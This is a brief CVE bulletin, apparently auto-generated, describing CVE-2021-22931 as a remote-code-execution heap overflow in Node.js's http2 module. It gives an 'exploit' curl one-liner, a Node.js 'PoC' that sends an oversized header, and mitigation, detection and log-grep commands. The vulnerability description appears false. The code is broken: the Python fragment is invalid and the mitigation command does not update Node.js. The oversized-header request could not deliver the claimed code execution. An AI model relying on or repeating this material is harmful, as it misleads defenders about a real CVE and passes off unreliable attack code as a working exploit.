How the CVE Works:
CVE-2021-22931 is a critical vulnerability in Node.js that allows remote attackers to execute arbitrary code due to improper input validation in the `http2` module. When handling large HTTP/2 headers, the server fails to properly validate payload size, leading to a heap-based buffer overflow. Attackers can exploit this by sending crafted HTTP/2 requests, triggering memory corruption and gaining control over the process. This vulnerability affects Node.js versions 12.x, 14.x, and 16.x before patches were applied. Successful exploitation enables full system compromise under the Node.js process privileges.
DailyCVE Form:
Platform: Node.js
Version: 12.x-16.x
Vulnerability: RCE via HTTP/2
Severity: Critical
Date: 2021-09-29
What Undercode Say:
Exploit:
curl -X POST --http2 -H "Overflow-Header: $(python -c 'print("A"5000)')" http://target:8080
Mitigation:
npm update -g node@latest
Detection:
node -v | grep -E "12.|14.|16." && echo "Vulnerable"
PoC Code:
const http2 = require('http2');
const client = http2.connect('http://target:8080');
const req = client.request({
':method': 'POST',
'overflow': 'A'.repeat(5000)
});
req.end();
Protection:
- Disable HTTP/2 if unused.
- Apply patches for Node.js 12.22.9, 14.18.1, 16.11.1.
- Use WAF to filter oversized headers.
Log Analysis:
grep -i "http2" /var/log/node.log | grep -E "large|overflow"
Impact:
- Remote code execution.
- Service disruption.
- Privilege escalation.
References:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
